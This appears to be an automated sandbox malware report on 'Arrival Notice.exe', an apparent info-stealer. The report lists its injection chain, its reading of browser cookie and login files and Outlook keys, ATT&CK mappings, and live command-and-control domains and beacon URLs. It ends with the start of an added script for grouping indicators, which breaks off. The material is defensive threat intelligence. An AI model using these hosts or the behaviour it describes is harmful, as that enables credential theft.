            Source: C:\Users\user\Desktop\Arrival Notice.exe | Code function: 0_2_003EBB6F _free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte
            Source: C:\Users\user\Desktop\Arrival Notice.exe | Code function: 0_2_003B42DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo

            Stealing of Sensitive Information

            Source: Yara match | File source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 00000001.00000002.1863602986.0000000003680000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000003.00000002.4134600469.0000000002F70000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000002.00000002.4136078962.0000000004A80000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000003.00000002.4136098252.0000000004E20000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000003.00000002.4136001289.0000000003520000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000001.00000002.1864681477.0000000005C00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000001.00000002.1863228024.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: C:\Windows\SysWOW64\clip.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
            Source: C:\Windows\SysWOW64\clip.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
            Source: C:\Windows\SysWOW64\clip.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
            Source: C:\Windows\SysWOW64\clip.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
            Source: C:\Windows\SysWOW64\clip.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
            Source: C:\Windows\SysWOW64\clip.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State
            Source: C:\Windows\SysWOW64\clip.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State
            Source: C:\Windows\SysWOW64\clip.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
            Source: C:\Windows\SysWOW64\clip.exe | Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\
            Source: Arrival Notice.exe | Binary or memory string: WIN_81
            Source: Arrival Notice.exe | Binary or memory string: WIN_XP
            Source: Arrival Notice.exeBinary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_11WIN_10WIN_2022WIN_2019WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\AppearanceUSERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte64HKEY_LOCAL_MACHINEHKLMHKEY_CLASSES_ROOTHKCRHKEY_CURRENT_CONFIGHKCCHKEY_CURRENT_USERHKCUHKEY_USERSHKUREG_EXPAND_SZREG_SZREG_MULTI_SZREG_DWORDREG_QWORDREG_BINARYRegDeleteKeyExWadvapi32.dll+.-.\\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs](*UCP)\XISVISIBLEISENABLEDTABLEFTTABRIGHTCURRENTTABSHOWDROPDOWNHIDEDROPDOWNADDSTRINGDELSTRINGFINDSTRINGGETCOUNTSETCURRENTSELECTIONGETCURRENTSELECTIONSELECTSTRINGISCHECKEDCHECKUNCHECKGETSELECTEDGETLINECOUNTGETCURRENTLINEGETCURRENTCOLEDITPASTEGETLINESENDCOMMANDIDGETITEMCOUNTGETSUBITEMCOUNTGETTEXTGETSELECTEDCOUNTISSELECTEDSELECTALLSELECTCLEARSELECTINVERTDESELECTFINDITEMVIEWCHANGEGETTOTALCOUNTCOLLAPSEEXPANDmsctls_statusbar321tooltips_class32%d/%02d/%02dbuttonComboboxListboxSysDateTimePick32SysMonthCal32.icl.exe.dllMsctls_Progress32msctls_trackbar32SysAnimate32msctls_updown32SysTabControl32SysTreeView32SysListView32-----@GUI_DRAGID@GUI_DROPID@GUI_DRAGFILEError text not found (please report)Q\EDEFINEUTF16)UTF)UCP)NO_AUTO_POSSESS)NO_START_OPT)LIMIT_MATCH=LIMIT_RECURSION=CR)LF)CRLF)ANY)ANYCRLF)BSR_ANYCRLF)BSR_UNICODE)argument is not a compiled regular expressionargument not compiled in 16 bit modeinternal error: opcode not recognizedinternal error: missing capturing bracketfailed to get memory
            Source: Arrival Notice.exe | Binary or memory string: WIN_XPe
            Source: Arrival Notice.exe | Binary or memory string: WIN_VISTA
            Source: Arrival Notice.exe | Binary or memory string: WIN_7
            Source: Arrival Notice.exe | Binary or memory string: WIN_8

            Remote Access Functionality

            Source: Yara match | File source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 00000001.00000002.1863602986.0000000003680000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000003.00000002.4134600469.0000000002F70000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000002.00000002.4136078962.0000000004A80000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000003.00000002.4136098252.0000000004E20000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000003.00000002.4136001289.0000000003520000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000001.00000002.1864681477.0000000005C00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000001.00000002.1863228024.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: C:\Users\user\Desktop\Arrival Notice.exe | Code function: 0_2_00431204 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,listen,WSAGetLastError,closesocket
            Source: C:\Users\user\Desktop\Arrival Notice.exe | Code function: 0_2_00431806 socket,WSAGetLastError,bind,WSAGetLastError,closesocket
            MITRE ATT&CK Matrix (listed by tactic column; a number in front of a technique is the badge the report shows beside it)

            Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS; Network Trust Dependencies; Network Topology
            Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services; Serverless; Malvertising
            Initial Access: 2 Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise; Exploit Public-Facing Application
            Execution: 1 Native API; Scheduled Task/Job; At; Cron; Launchd; Scheduled Task; Systemd Timers; Container Orchestration Job; Command and Scripting Interpreter
            Persistence: 1 DLL Side-Loading; 2 Valid Accounts; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job; At
            Privilege Escalation: 1 Exploitation for Privilege Escalation; 1 Abuse Elevation Control Mechanism; 1 DLL Side-Loading; 2 Valid Accounts; 21 Access Token Manipulation; 412 Process Injection; Startup Items; Scheduled Task/Job; At
            Defense Evasion: 1 Disable or Modify Tools; 1 Deobfuscate/Decode Files or Information; 1 Abuse Elevation Control Mechanism; 3 Obfuscated Files or Information; 1 DLL Side-Loading; 2 Valid Accounts; 12 Virtualization/Sandbox Evasion; 21 Access Token Manipulation; 412 Process Injection
            Credential Access: 1 OS Credential Dumping; 21 Input Capture; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem; /etc/passwd and /etc/shadow
            Discovery: 2 System Time Discovery; 1 Account Discovery; 2 File and Directory Discovery; 116 System Information Discovery; 241 Security Software Discovery; 12 Virtualization/Sandbox Evasion; 3 Process Discovery; 11 Application Window Discovery; 1 System Owner/User Discovery
            Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Cloud Services; Direct Cloud VM Connections
            Collection: 1 Archive Collected Data; 1 Data from Local System; 1 Email Collection; 21 Input Capture; 3 Clipboard Data; GUI Input Capture; Web Portal Capture; Credential API Hooking; Data Staged
            Command and Control: 4 Ingress Tool Transfer; 1 Encrypted Channel; 4 Non-Application Layer Protocol; 4 Application Layer Protocol; Fallback Channels; Multiband Communication; Commonly Used Port; Application Layer Protocol; Web Protocols
            Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol; Exfiltration Over Symmetric Encrypted Non-C2 Protocol
            Impact: 1 System Shutdown/Reboot; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery; Defacement; Internal Defacement
            Behavior Graph ID: 1494709 | Sample: Arrival Notice.exe | Startdate: 19/08/2024 | Architecture: WINDOWS | Score: 100

            Sample-level domains/IPs: www.xn--matfrmn-jxa4m.se; www.xn--fhq1c541j0zr.com; 13 other IPs or domains
            Sample-level signatures: Multi AV Scanner detection for domain / URL; Suricata IDS alerts for network traffic; Malicious sample detected (through community Yara rule); 9 other signatures

            Process tree:
            Arrival Notice.exe 4 (started) | signatures: Binary is likely a compiled AutoIt script file; Writes to foreign memory regions; Maps a DLL or memory area into another process
                svchost.exe (started) | signatures: Maps a DLL or memory area into another process
                    IprrrFQGqOjAyLqOuuogohDyaEetb.exe (injected) | signatures: Found direct / indirect Syscall (likely to bypass EDR)
                        clip.exe 13 (started) | signatures: Tries to steal Mail credentials (via file / registry access); Tries to harvest and steal browser information (history, passwords, etc); Modifies the context of a thread in another process (thread injection); 3 other signatures
                            IprrrFQGqOjAyLqOuuogohDyaEetb.exe (injected) | signatures: Found direct / indirect Syscall (likely to bypass EDR) | network: www.anuts.top 23.251.54.212, ports 61891, 61892, 61893 (VPSQUANUS, United States); parkingpage.namecheap.com 91.195.240.19, ports 61903, 61904, 61905 (SEDO-ASDE, Germany); 8 other IPs or domains
                            firefox.exe (started)

Antivirus detection: initial sample

Source | Detection | Scanner | Label | Link
Arrival Notice.exe | 37% | ReversingLabs | |
Arrival Notice.exe | 27% | Virustotal | | Browse
Arrival Notice.exe | 100% | Joe Sandbox ML | |

Antivirus detection: dropped files
No Antivirus matches

Antivirus detection: unpacked PE files
No Antivirus matches
Antivirus detection: domains

Source | Detection | Scanner | Label | Link
www.sandranoll.com | 11% | Virustotal | | Browse
www.dmtxwuatbz.cc | 2% | Virustotal | | Browse
www.xn--matfrmn-jxa4m.se | 0% | Virustotal | | Browse
www.catherineviskadi.com | 1% | Virustotal | | Browse
www.anuts.top | 7% | Virustotal | | Browse
www.telwisey.info | 2% | Virustotal | | Browse
www.hprlz.cz | 1% | Virustotal | | Browse
www.hatercoin.online | 2% | Virustotal | | Browse
www.bfiworkerscomp.com | 0% | Virustotal | | Browse
parkingpage.namecheap.com | 0% | Virustotal | | Browse
www.xn--fhq1c541j0zr.com | 0% | Virustotal | | Browse
www.gipsytroya.com | 1% | Virustotal | | Browse
www.helpers-lion.online | 0% | Virustotal | | Browse
Antivirus detection: URLs

Source | Detection | Scanner | Label | Link
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command= | 0% | URL Reputation | safe |
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search | 0% | URL Reputation | safe |
https://www.ecosia.org/newtab/ | 0% | URL Reputation | safe |
https://ac.ecosia.org/autocomplete?q= | 0% | URL Reputation | safe |
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q= | 0% | URL Reputation | safe |
http://www.anuts.top/li0t/?Cj=Qhv8RTO8YPvh6L30&lH=cVY/NretpRV3pSqaegFyh+jFAYxH5xF9S8puWnY234sUXEzh+T0fGizPv/1GJq+MSLyulFxDkLwqIofvrKUfnjThT7p1YiNwwCR+sQ8vfCBR1TGxYf2LNfg= | 0% | Avira URL Cloud | safe |
https://www.hprlz.cz/w6qg/?Cj=Qhv8RTO8YPvh6L30&lH=0lpTRQcDUH | 0% | Avira URL Cloud | safe |
https://duckduckgo.com/ac/?q= | 0% | Avira URL Cloud | safe |
https://duckduckgo.com/chrome_newtab | 0% | Avira URL Cloud | safe |
https://dts.gnpge.com | 0% | Avira URL Cloud | safe |
https://duckduckgo.com/chrome_newtab | 0% | Virustotal | | Browse
https://duckduckgo.com/ac/?q= | 0% | Virustotal | | Browse
https://dts.gnpge.com | 0% | Virustotal | | Browse
http://www.sandranoll.com/aroo/?Cj=Qhv8RTO8YPvh6L30&lH=bKy7FSIHmKYFjPoOU8uZGqQpeblpEQl2twFEynhtde+XdOqoRjh1sl1n+ba+sSXyFBuEELqLWRHnTW9JDkHGH0ELwMgy3j7Qb0m6Rmga/hvJBmgScr7TS3s= | 100% | Avira URL Cloud | malware |
https://cdnjs.cloudflare.com/ajax/libs/twitter-bootstrap/4.1.3/css/bootstrap.min.css | 0% | Avira URL Cloud | safe |
https://cdnjs.cloudflare.com/ajax/libs/twitter-bootstrap/4.1.3/css/bootstrap.min.css | 0% | Virustotal | | Browse
http://www.xn--fhq1c541j0zr.com/rm91/ | 0% | Avira URL Cloud | safe |
https://static.loopia.se/responsive/images/iOS-72.png | 0% | Avira URL Cloud | safe |
http://www.bfiworkerscomp.com/xzzi/ | 0% | Avira URL Cloud | safe |
http://www.xn--fhq1c541j0zr.com/rm91/ | 0% | Virustotal | | Browse
https://www.domaintechnik.at/fileadmin/gfx/logos/hostedsoft/gallery.png | 0% | Avira URL Cloud | safe |
https://www.loopia.com/support?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parking | 0% | Avira URL Cloud | safe |
http://www.domaintechnik.at/data/gfx/dt_logo_parking.png | 0% | Avira URL Cloud | safe |
http://www.bfiworkerscomp.com/px.js?ch=2 | 0% | Avira URL Cloud | safe |
https://static.loopia.se/responsive/images/iOS-72.png | 0% | Virustotal | | Browse
https://www.domaintechnik.at/fileadmin/gfx/logos/hostedsoft/gallery.png | 0% | Virustotal | | Browse
http://www.bfiworkerscomp.com/px.js?ch=1 | 0% | Avira URL Cloud | safe |
http://www.dmtxwuatbz.cc/lfkn/?lH=gu3cG9GLpLv0C38b+jYCf7UBXt4URUEycVQhN1coGdiN+H1mAKnEyno+ahRh93ZPWIJTdN+wkaWXNdzclzMT+BORo/i7gxKdhtDjyoGaGd8n3Q21UEESNSU=&Cj=Qhv8RTO8YPvh6L30 | 0% | Avira URL Cloud | safe |
https://static.loopia.se/shared/logo/logo-loopia-white.svg | 0% | Avira URL Cloud | safe |
https://www.loopia.com/login?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingwe | 0% | Avira URL Cloud | safe |
https://www.loopia.com/order/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingw | 0% | Avira URL Cloud | safe |
http://www.bfiworkerscomp.com/xzzi/ | 0% | Virustotal | | Browse
http://www.domaintechnik.at/data/gfx/dt_logo_parking.png | 0% | Virustotal | | Browse
http://www.catherineviskadi.com/qe66/?lH=dnvLceXALBk3Hr4+RUpDuj1gE1lZ37++NG0MGchlNc+FfqCdFLzpUNQMmrv30qtrBi93uCjMcFA24SebHgOv/zqChZDwQ/s0nTN9cl2J79+sQIZRijKLgDM=&Cj=Qhv8RTO8YPvh6L30 | 0% | Avira URL Cloud | safe |
https://www.loopia.com/support?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parking | 1% | Virustotal | | Browse
https://www.domaintechnik.at/fileadmin/gfx/logos/hostedsoft/joomla-2.png | 0% | Avira URL Cloud | safe |
https://www.loopia.com/login?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingwe | 1% | Virustotal | | Browse
https://www.domaintechnik.at/fileadmin/gfx/logos/hostedsoft/mediawiki.png | 0% | Avira URL Cloud | safe |
https://static.loopia.se/shared/logo/logo-loopia-white.svg | 0% | Virustotal | | Browse
https://www.loopia.com/wordpress/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=park | 0% | Avira URL Cloud | safe |
http://www.dmtxwuatbz.cc/lfkn/ | 0% | Avira URL Cloud | safe |
http://www.telwisey.info/ei85/?lH=ORmqfURBt40sHMHMpa9bONKIG0NKJL7I9iieY9Aomdlbsbne+w1Kch9DF1irZ5FVSFO0rJB3/OJZWwrRbdUXnSdkLDuG3HSn8XcjXW0hCgpfinKrOJZMnTQ=&Cj=Qhv8RTO8YPvh6L30 | 0% | Avira URL Cloud | safe |
https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css | 0% | Avira URL Cloud | safe |
https://www.loopia.com/wordpress/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=park | 0% | Virustotal | | Browse
https://www.loopia.com/order/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingw | 1% | Virustotal | | Browse
https://www.domaintechnik.at/fileadmin/gfx/logos/hostedsoft/joomla-2.png | 0% | Virustotal | | Browse
http://www.sandranoll.com/aroo/ | 100% | Avira URL Cloud | malware |
https://static.loopia.se/shared/images/additional-pages-hero-shape.webp | 0% | Avira URL Cloud | safe |
https://static.loopia.se/shared/style/2022-extra-pages.css | 0% | Avira URL Cloud | safe |
http://www.gipsytroya.com/tf44/ | 100% | Avira URL Cloud | malware |
https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css | 0% | Virustotal | | Browse
https://static.loopia.se/shared/style/2022-extra-pages.css | 0% | Virustotal | | Browse
http://www.xn--matfrmn-jxa4m.se/4hda/ | 100% | Avira URL Cloud | malware |
https://static.loopia.se/shared/images/additional-pages-hero-shape.webp | 0% | Virustotal | | Browse
https://static.loopia.se/responsive/images/iOS-114.png | 0% | Avira URL Cloud | safe |
https://www.google.com/images/branding/product/ico/googleg_lodp.ico | 0% | Avira URL Cloud | safe |
http://www.xn--matfrmn-jxa4m.se/4hda/ | 0% | Virustotal | | Browse
https://www.domaintechnik.at/fileadmin/gfx/logos/hostedsoft/mediawiki.png | 0% | Virustotal | | Browse
http://www.telwisey.info/ei85/ | 0% | Avira URL Cloud | safe |
https://www.loopia.com/loopiadns/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=park | 0% | Avira URL Cloud | safe |
http://www.gipsytroya.com/tf44/ | 7% | Virustotal | | Browse
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q= | 0% | Avira URL Cloud | safe |
http://www.bfiworkerscomp.com/sk-logabpstatus.php?a=UjNZQ0VuZmNSTGxudFk1ejYxKzNaQ0FiYW43cEtXaFhmSFFT | 0% | Avira URL Cloud | safe |
https://www.google.com/images/branding/product/ico/googleg_lodp.ico | 0% | Virustotal | | Browse
https://static.loopia.se/responsive/images/iOS-114.png | 0% | Virustotal | | Browse
http://whois.loopia.com/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingweb&ut | 0% | Avira URL Cloud | safe |
http://www.telwisey.info/ei85/ | 2% | Virustotal | | Browse
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q= | 0% | Virustotal | | Browse
http://www.xn--fhq1c541j0zr.com/rm91/?Cj=Qhv8RTO8YPvh6L30&lH=jSd7r+67+N1qAQkwJvt+iUxfFwvrPy4ZQchR8WhIexhCyQiFJMwmzlR6zVHzfOVMvsfcwBywDpFhuhrgfB+WG8UhwnSvsDBe28fizd0dRyqF3cPtSZfQjsU= | 0% | Avira URL Cloud | safe |
https://static.loopia.se/responsive/styles/reset.css | 0% | Avira URL Cloud | safe |
http://www.hprlz.cz/w6qg/?Cj=Qhv8RTO8YPvh6L30&lH=0lpTRQcDUH+iEsGyb7K93jJ3AkchBc2e7Z/xuNmTgdli9rpOUGyXizj5cQ9XxC4so84FNpFR9txXxm0tq1CayhJ+NIkCDL9/8P53q6zBNKDHtjSuHiPb7bo= | 0% | Avira URL Cloud | safe |
https://static.loopia.se/responsive/images/iOS-57.png | 0% | Avira URL Cloud | safe |
http://www.gipsytroya.com/tf44/?lH=zHiAY6EG+HxIxFu9b4tfleXF6yb9aKgM+W8Rr/tGfSzDPDxggLk9FyyADeImH3/ZYgS5WMd+vNhhyXlbnciywdLjC/RTAaKLEzmduXRfLlKkNxNmYFq4qCQ=&Cj=Qhv8RTO8YPvh6L30 | 100% | Avira URL Cloud | malware |
https://cdnjs.cloudflare.com/ajax/libs/gsap/3.1.1/gsap.min.js | 0% | Avira URL Cloud | safe |
https://www.loopia.com/loopiadns/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=park | 1% | Virustotal | | Browse
http://www.xn--matfrmn-jxa4m.se/4hda/?lH=+FYRabRorC7iiipdZ2F3S2JpD5gx1+4XHVGGEQvE/CSzp7OmTlR57ws6ggMdmmjgEK74RwiZfuW5KkdpyqG9+fjZ9jEj5Dze7n0KBNuQ8eKVrjet+eDbX/8=&Cj=Qhv8RTO8YPvh6L30 | 100% | Avira URL Cloud | malware |
https://static.loopia.se/responsive/styles/reset.css | 0% | Virustotal | | Browse
https://www.loopia.com/sitebuilder/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=pa | 0% | Avira URL Cloud | safe |
http://www.catherineviskadi.com/qe66/ | 0% | Avira URL Cloud | safe |
https://www.hprlz.cz/w6qg/?Cj=Qhv8RTO8YPvh6L30&amp;lH=0lpTRQcDUH | 0% | Avira URL Cloud | safe |
https://www.loopia.com/domainnames/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=pa | 0% | Avira URL Cloud | safe |
http://www.dmtxwuatbz.cc | 0% | Avira URL Cloud | safe |
http://www.anuts.top/li0t/ | 0% | Avira URL Cloud | safe |
http://whois.loopia.com/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingweb&ut | 0% | Virustotal | | Browse
http://www.bfiworkerscomp.com/xzzi/?Cj=Qhv8RTO8YPvh6L30&lH=9CTSfwlM5YWl8fvbrbSkFth60mtnncbW1FpC9VokAvwkUHOJycf2DDxLp9tWLELwEKEPfCC2oiLqmqE9jQi/S4FmCg8fmWLidol7jMU2H7Flt+5ZogJ/ZG4= | 0% | Avira URL Cloud | safe |
https://www.loopia.com/hosting/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkin | 0% | Avira URL Cloud | safe |
https://www.loopia.com/woocommerce/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=pa | 0% | Avira URL Cloud | safe |
https://www.loopia.se?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingweb | 0% | Avira URL Cloud | safe |
https://www.domaintechnik.at/fileadmin/gfx/icons/cp/64x64/mysql.png | 0% | Avira URL Cloud | safe |
Contacted domains

Name | IP | Active | Malicious | Antivirus Detection | Reputation
www.sandranoll.com | 213.145.228.16 | true | true | | unknown
www.dmtxwuatbz.cc | 104.21.45.56 | true | true | | unknown
www.xn--matfrmn-jxa4m.se | 194.9.94.85 | true | true | | unknown
www.catherineviskadi.com | 217.160.0.106 | true | true | | unknown
www.anuts.top | 23.251.54.212 | true | true | | unknown
www.bfiworkerscomp.com | 208.91.197.27 | true | true | | unknown
parkingpage.namecheap.com | 91.195.240.19 | true | true | | unknown
www.telwisey.info | 199.192.19.19 | true | true | | unknown
www.hprlz.cz | 5.44.111.162 | true | true | | unknown
www.xn--fhq1c541j0zr.com | 43.252.167.188 | true | true | | unknown
www.fourgrouw.cfd | unknown | unknown | true | | unknown
www.hatercoin.online | unknown | unknown | true | | unknown
www.tinmapco.com | unknown | unknown | true | | unknown
www.gipsytroya.com | unknown | unknown | true | | unknown
www.helpers-lion.online | unknown | unknown | true | | unknown
Contacted URLs

Name | Malicious | Antivirus Detection | Reputation
http://www.anuts.top/li0t/?Cj=Qhv8RTO8YPvh6L30&lH=cVY/NretpRV3pSqaegFyh+jFAYxH5xF9S8puWnY234sUXEzh+T0fGizPv/1GJq+MSLyulFxDkLwqIofvrKUfnjThT7p1YiNwwCR+sQ8vfCBR1TGxYf2LNfg= | true | Avira URL Cloud: safe | unknown
http://www.sandranoll.com/aroo/?Cj=Qhv8RTO8YPvh6L30&lH=bKy7FSIHmKYFjPoOU8uZGqQpeblpEQl2twFEynhtde+XdOqoRjh1sl1n+ba+sSXyFBuEELqLWRHnTW9JDkHGH0ELwMgy3j7Qb0m6Rmga/hvJBmgScr7TS3s= | true | Avira URL Cloud: malware | unknown
http://www.xn--fhq1c541j0zr.com/rm91/ | true | Virustotal: 0% (Browse); Avira URL Cloud: safe | unknown
http://www.bfiworkerscomp.com/xzzi/ | true | Virustotal: 0% (Browse); Avira URL Cloud: safe | unknown
http://www.dmtxwuatbz.cc/lfkn/?lH=gu3cG9GLpLv0C38b+jYCf7UBXt4URUEycVQhN1coGdiN+H1mAKnEyno+ahRh93ZPWIJTdN+wkaWXNdzclzMT+BORo/i7gxKdhtDjyoGaGd8n3Q21UEESNSU=&Cj=Qhv8RTO8YPvh6L30 | true | Avira URL Cloud: safe | unknown
http://www.catherineviskadi.com/qe66/?lH=dnvLceXALBk3Hr4+RUpDuj1gE1lZ37++NG0MGchlNc+FfqCdFLzpUNQMmrv30qtrBi93uCjMcFA24SebHgOv/zqChZDwQ/s0nTN9cl2J79+sQIZRijKLgDM=&Cj=Qhv8RTO8YPvh6L30 | true | Avira URL Cloud: safe | unknown
http://www.dmtxwuatbz.cc/lfkn/ | true | Avira URL Cloud: safe | unknown
http://www.telwisey.info/ei85/?lH=ORmqfURBt40sHMHMpa9bONKIG0NKJL7I9iieY9Aomdlbsbne+w1Kch9DF1irZ5FVSFO0rJB3/OJZWwrRbdUXnSdkLDuG3HSn8XcjXW0hCgpfinKrOJZMnTQ=&Cj=Qhv8RTO8YPvh6L30 | true | Avira URL Cloud: safe | unknown
http://www.sandranoll.com/aroo/ | true | Avira URL Cloud: malware | unknown
http://www.gipsytroya.com/tf44/ | true | Virustotal: 7% (Browse); Avira URL Cloud: malware | unknown
http://www.xn--matfrmn-jxa4m.se/4hda/ | true | Virustotal: 0% (Browse); Avira URL Cloud: malware | unknown
http://www.telwisey.info/ei85/ | true | Virustotal: 2% (Browse); Avira URL Cloud: safe | unknown
http://www.xn--fhq1c541j0zr.com/rm91/?Cj=Qhv8RTO8YPvh6L30&lH=jSd7r+67+N1qAQkwJvt+iUxfFwvrPy4ZQchR8WhIexhCyQiFJMwmzlR6zVHzfOVMvsfcwBywDpFhuhrgfB+WG8UhwnSvsDBe28fizd0dRyqF3cPtSZfQjsU= | true | Avira URL Cloud: safe | unknown
http://www.hprlz.cz/w6qg/?Cj=Qhv8RTO8YPvh6L30&lH=0lpTRQcDUH+iEsGyb7K93jJ3AkchBc2e7Z/xuNmTgdli9rpOUGyXizj5cQ9XxC4so84FNpFR9txXxm0tq1CayhJ+NIkCDL9/8P53q6zBNKDHtjSuHiPb7bo= | true | Avira URL Cloud: safe | unknown
http://www.gipsytroya.com/tf44/?lH=zHiAY6EG+HxIxFu9b4tfleXF6yb9aKgM+W8Rr/tGfSzDPDxggLk9FyyADeImH3/ZYgS5WMd+vNhhyXlbnciywdLjC/RTAaKLEzmduXRfLlKkNxNmYFq4qCQ=&Cj=Qhv8RTO8YPvh6L30 | true | Avira URL Cloud: malware | unknown
http://www.xn--matfrmn-jxa4m.se/4hda/?lH=+FYRabRorC7iiipdZ2F3S2JpD5gx1+4XHVGGEQvE/CSzp7OmTlR57ws6ggMdmmjgEK74RwiZfuW5KkdpyqG9+fjZ9jEj5Dze7n0KBNuQ8eKVrjet+eDbX/8=&Cj=Qhv8RTO8YPvh6L30 | true | Avira URL Cloud: malware | unknown
http://www.catherineviskadi.com/qe66/ | true | Avira URL Cloud: safe | unknown
http://www.anuts.top/li0t/ | true | Avira URL Cloud: safe | unknown
http://www.bfiworkerscomp.com/xzzi/?Cj=Qhv8RTO8YPvh6L30&lH=9CTSfwlM5YWl8fvbrbSkFth60mtnncbW1FpC9VokAvwkUHOJycf2DDxLp9tWLELwEKEPfCC2oiLqmqE9jQi/S4FmCg8fmWLidol7jMU2H7Flt+5ZogJ/ZG4= | true | Avira URL Cloud: safe | unknown
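Every contacted URL above has the same shape: a four-character directory on a different host, a Cj parameter that is identical (Qhv8RTO8YPvh6L30) across all of them, and a long base64-looking lH blob that differs per request. Per-URL reputation is of little use here: Avira URL Cloud rates the full beacon on www.anuts.top "safe" and the same shape on www.sandranoll.com "malware". Grouping by the shared token is the more reliable way to turn this list into indicators. The following is an added example, not code from the Joe Sandbox report: the URLs are copied from the tables on this page, the parameter names Cj and lH come from those URLs, and treating the four-character-path-plus-Cj shape as a "beacon" is this example's own assumption. It also handles the two awkward variants the page contains, the HTML-escaped `&amp;` copy and the truncated lH value.

```python
"""Group the beacon-style URLs from a sandbox report by their shared Cj token.

Added example, not part of the Joe Sandbox report. URLs are copied from the
report's URL tables; the parameter names Cj/lH come from those URLs, while the
"beacon" classification rule (four-character directory plus Cj) is an assumption
of this example.
"""
import html
import re
from collections import defaultdict
from urllib.parse import urlsplit

# Shape of the C2-style URLs in the report: a four-character directory and the
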